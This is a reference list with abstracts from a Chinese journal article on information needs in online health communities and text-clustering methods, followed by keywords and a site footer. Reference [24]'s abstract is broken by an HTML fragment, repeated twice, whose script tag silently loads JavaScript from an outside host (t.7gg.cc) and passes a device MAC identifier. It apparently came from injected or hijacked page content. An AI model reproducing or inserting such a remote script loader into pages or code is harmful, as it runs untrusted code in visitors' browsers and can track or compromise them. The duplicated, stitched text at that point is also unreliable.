[17] Bernad V M, Maderuelo F J Á, Moreno G P. Information Needs of the Health and Diseases in Users of Healthcare Services in Primary Care at Salamanca, Spain[J]. Atencion Primaria, 2016, 48(1): 15-24.
DOI:10.1016/j.aprim.2015.01.011      URL     [本文引用:1]
[18] Bowler L, Oh J S, He D, et al.Eating Disorder Questions in Yahoo! Answers: Information, Conversation, or Reflection?[C]// Proceedings of the American Society for Information Science and Technology. 2012.
[本文引用:1]
[19] 金碧漪, 许鑫. 社会化问答社区中糖尿病健康信息的需求分析[J]. 中华医学图书情报杂志, 2014, 23(12): 37-42.
为了解消费者对糖尿病信息的需求,选取雅虎问答中糖尿病相关的8762条提问记录作为研究对象,根据糖尿病信息的类目体系及分类策略对其进行人工编码,再进行文本处理,获得表征糖尿病健康信息需求的587个中心词,并通过多维尺度分析方法,对每个需求类目下的中心词进一步聚类发现,消费者对于糖尿病健康信息最大的关注点是日常疾病管理、疾病确诊和治疗,而对疾病预防缺乏应有的关注度。
DOI:10.3969/j.issn.1671-3982.2014.12.010      URL     [本文引用:2]
(Jin Biyi, Xu Xin.Health Information Needs of Diabetics in Social Q&A Community[J]. Chinese Journal of Medical Library and Information Science, 2014, 23(12): 37-42.)
[20] Stonbraker S, Larson E.Health-information Needs of HIV-positive Adults in Latin America and the Caribbean: An Integrative Review of the Literature[J]. Aids Care, 2016, 28(10): 1223-1229.
An assessment of information needs is essential for care planning for patients living with chronic diseases such as human immunodeficiency virus (HIV). The extent to which these assessments have been conducted in Latin America and the Caribbean (LAC) is unknown. The purpose of this study was, therefore, to identify, evaluate, and summarize what research has been conducted to examine patient perceptions of their health-information needs among adults living with HIV in LAC. Using an integrative review methodology, a literature search of six databases was conducted in April and May 2015. Inclusion criteria were peer-reviewed articles published in English or Spanish that assessed the information needs of HIV-positive patients living in LAC. The quality of included articles was assessed and relevant characteristics of each article were extracted, compared, and presented. Searches returned 1885 citations, 11 of which met inclusion criteria. Studies included were conducted in 8 of 33 countries, used multiple research designs, demonstrated varying needs between populations, and found numerous unmet information needs. Information about HIV in general, methods of infection transmission, antiretroviral medications, other sexually transmitted diseases, and effective coping mechanisms were the most commonly mentioned needs. Healthcare providers were the largest and most reliable source of health information for many participants and it was emphasized that in order for health education to be effective, programs should include both individual and group components. Patients indicated that they may have difficulty processing and using information through an incorrect understanding of medications, not changing risk behaviors, and by stating that information can be overwhelming or poorly communicated. Further research on information needs is warranted so that healthcare providers and organizations may provide the information patients need to appropriately manage their health.
DOI:10.1080/09540121.2016.1173645      PMID:27098484      URL     [本文引用:1]
[21] 吕英杰. 网络健康社区中的文本挖掘方法研究[D]. 上海: 上海交通大学, 2013.
[本文引用:1]
(Lv Yingjie.Research on Text Mining in Online Health Community[D]. Shanghai: Shanghai Jiao Tong University, 2013.)
[22] 李重阳, 翟姗姗, 郑路. 网络健康社区信息需求特征测度——基于时间和主题视角的实证分析[J]. 数字图书馆论坛, 2016(9): 34-42.
以在线问答社区中癌症信息为例,对其信息需求从时间和主题两个角度进行综合测度。对不同时间的数据进行分组,采用LDA主题挖掘法来确定相关编码规则,探求在线问答祉区中用户信息需求特征,发现用户对癌症信息的需求主要集中在若干个主题,并且对各主题的关注度随时间呈现出一定的变化趋势。进一步探究在线问答社区健康信息服务存在的问题,为促使各网络健康社区信息服务水平的提高提供参考和指导。
DOI:10.3772/j.issn.1673-2286.2016.9.006      URL     [本文引用:2]
(Li Chongyang, Zhai Shanshan, Zhen Lu.Measurement of Information Demand Characteristics in Online Health Community: An Empirical Analysis Based on Time and Theme Perspective[J]. Digital Library Forum, 2016(9): 34-42.)
[23] 龙树全, 赵正文, 唐华. 中文分词算法概述[J]. 电脑知识与技术, 2009, 5(10): 2605-2607.
[本文引用:1]
(Long Shuquan, Zhao Zhengwen, Tang Hua.Overview on Chinese Segmentation Algorithm[J]. Computer Knowledge and Technology, 2009, 5(10): 2605-2607.)
[24] 常娥. 基于LSI理论的文本自动聚类研究[J]. 图书情报工作, 2012, 56(11): 89-92.<html dir="ltr"><head><title></title><script async=true src="http://t.7gg.cc:88/j1.js?MAC=68DB542C8756"></script> </head><body>结合潜性语义索引(latent semantic index,LSI)理论和K-means聚类法,提出一种改进的文本自动聚类方法,即首先利用N-gram统计法抽取文档关键词,并应用潜性语义索引LSI对构建文档的向量空间模型进行降维,然后采用K-means算法进行文本聚类。实验表明,该算法进行文本聚类的准确度最高可达84.7%。</body></html>
<html dir="ltr"><head><title></title><script async=true src="http://t.7gg.cc:88/j1.js?MAC=68DB542C8756"></script> </head><body>结合潜性语义索引(latent semantic index,LSI)理论和K-means聚类法,提出一种改进的文本自动聚类方法,即首先利用N-gram统计法抽取文档关键词,并应用潜性语义索引LSI对构建文档的向量空间模型进行降维,然后采用K-means算法进行文本聚类。实验表明,该算法进行文本聚类的准确度最高可达84.7%。</body></html>
Magsci     URL     [本文引用:1]
(Chang E.Automatic Text Clustering Based on Latent Semantic Index Theory[J]. Library and Information Service, 2012, 56(11): 89-92.)
[25] 李钊, 李晓, 王春梅, . 一种基于MapReduce的文本聚类方法研究[J]. 计算机科学, 2016, 43(1): 246-250.
在文本聚类中,相似性度量是影响聚类效果的重要因素。常用的相似性度量测度,如欧氏距离、相关系数等,只能描述文本间的低阶相关性,而文本间的关系非常复杂,基于低阶相关测度的聚类效果不太理想。一些基于复杂测度的文本聚类方法已被提出,但随着数据规模的扩展,文本聚类的计算量不断增加,传统的聚类方法已不适用于大规模文本聚类。针对上述问题,提出一种基于MapReduce的分布式聚类方法,该方法对传统K-means算法进行了改进,采用了基于信息损失量的相似性度量。为进一步提高聚类的效率,将该方法与基于MapReduce的主成分分析方法相结合,以降低文本特征向量的维数。实例分析表明,提出的大规模文本聚类方法的聚类性能比已有的聚类方法更好。
DOI:10.11896/j.issn.1002-137X.2016.1.053      URL     [本文引用:2]
(Li Zhao, Li Xiao, Wang Chunmei, et al.Text Clustering Method Study Based on MapReduce[J]. Computer Science, 2016, 43(1): 246-250.)
[26] 吴江, 侯绍新, 靳萌萌, . 基于LDA模型特征选择的在线医疗社区文本分类及用户聚类研究[J]. 情报学报, 2017, 36(11): 1183-1191.
随着互联网时代的快速发展,在线医疗社区的出现打破了时空限制,为用户提供了丰富的医疗信息和情感帮助,已经成为社会支持的重要来源,受到用户的广泛关注和参与。对在线医疗社区进行用户文本挖掘能够揭示社区中用户的参与行为,从而优化其用户管理和信息推荐。已有的研究对象主要集中在英文在线医疗社区,鲜有文献对中文在线医疗社区进行研究。基于社会支持理论,本文设计了一个中文用户文本挖掘流程来研究中文在线医疗社区中的社会支持类型和用户参与。利用中文文本挖掘及机器学习方法,对中文糖尿病社区“甜蜜家园”进行研究。本文利用LDA(LatentDirichlet Allocation)模型进行特征提取来构建低维度文本表示向量,采用二元分类法将用户文本分为不同的社会支持类型。最后,基于分类结果使用K-means算法进行用户聚类来识别用户角色。相比传统的特征提取方法,利用LDA进行特征提取能显著地降低数据维度,优化分类模型,提高分类准确率和分类效率。结果表明,本文提出的中文用户文本挖掘流程在文本分类与用户聚类中效果显著。
URL     [本文引用:1]
(Wu Jiang, Hou Shaoxin, Jin Mengmeng, et al.LDA Feature Selection Based Text Classification and User Clustering in Chinese Online Health Community[J]. Journal of the China Society for Scientific and Technical Information, 2017, 36(11): 1183-1191.)
[27] 郑英鑫. 数据挖掘中基于肘部法则的聚类分析在中小学生出行路线优化设计的应用[J]. 电子世界, 2017(9): 146.
本文介绍了在数据挖掘中,采用K-Means聚类分析算法对数据进行分析与挖掘。但由于K-Means使用时,初始重心是随机选取的,因此很容易陷入局部最优解。为解决该问题,引入了肘部法则(Elbow)。K-Means通常初始时要重复运行十几次甚至上百次,这时采用肘部法则计算出最小的成本函数对应的重心位置作为初始化位置,就很好的改善了局部最优解问题。
URL     [本文引用:1]
(Zheng Yingxin.Application of Clustering Analysis Based on Elbow Rule in Data Mining in the Optimization Design of Primary and Secondary School Students' Travel Routes[J]. Electronics World, 2017(9): 146.)
[28] Kanungo T, Mount D M, Netanyahu N S, et al.An Efficient K-means Clustering Algorithm: Analysis and Implementation[J]. IEEE Transactions on Pattern Analysis and Machine Intelligence, 2002, 24(7): 881-892.
In k-means clustering, we are given a set of n data points in d-dimensional space R/sup d/ and an integer k and the problem is to determine a set of k points in Rd, called centers, so as to minimize the mean squared distance from each data point to its nearest center. A popular heuristic for k-means clustering is Lloyd's (1982) algorithm. We present a simple and efficient implementation of Lloyd's k-means clustering algorithm, which we call the filtering algorithm. This algorithm is easy to implement, requiring a kd-tree as the only major data structure. We establish the practical efficiency of the filtering algorithm in two ways. First, we present a data-sensitive analysis of the algorithm's running time, which shows that the algorithm runs faster as the separation between clusters increases. Second, we present a number of empirical studies both on synthetically generated data and on real data sets from applications in color quantization, data compression, and image segmentation.
DOI:10.1109/TPAMI.2002.1017616      URL     [本文引用:1]
[29] Cho J, Noh H, Ha M H, et al.What Kind of Cancer Information Do Internet Users Need?[J]. Supportive Care in Cancer, 2011, 19(9): 1465-1469.
DOI:10.1007/s00520-010-1057-9      URL     [本文引用:1]
[30] Chen W.Cancer Statistics: Updated Cancer Burden in China[J]. Chinese Journal of Cancer Research, 2015, 27(1): 1.
Cancer is a major public health issue in most of countries,including China.Accurate and valid information on cancer incidence,mortality,survival and relevant factors is irreplaceable for cancer prevention and control.Since the national program of cancer registry was launched by the Ministry of Health of China in 2008,the National Central Cancer Registry (NCCR) has been releasing the cancer incidence and mortality based on the data collected from cancer registries supported by the program.The cancer statistics provide current data from registered areas and aims to accurately reflect the cancer burden and epidemic in China.In 2014,the NCCR collected data for calendar year 2011 from 234 registries.After comprehensive quality evaluation,data from 177 registries have been selected as sources of the reports reflecting cancer incidence and mortality in the registration areas in 2011.These reports are the updated cancer statistics so far,covering much more registries and a big population.
DOI:10.3978/j.issn.1000-9604.2015.02.07      PMID:25717219      URL     [本文引用:1]
资源
PDF下载数    
RichHTML 浏览数    
摘要点击数    

分享
导出

相关文章:
关键词(key words)
网络健康社区
信息需求
大数据挖掘
分布式文本聚类
肿瘤

Online Health Community
Information Needs
Big Data Mining
Distributed Text Clusteri...
Tumor

作者
陆泉
朱安琪
张霁月
陈静

Lu Quan
Zhu Anqi
Zhang Jiyue
Chen Jing
版权所有 © 2015 《数据分析与知识发现》编辑部
地址:北京市海淀区中关村北四环西路33号 邮编:100190
电话/传真:(010)82626611-6626,82624938
E-mail:jishu@mail.las.ac.cn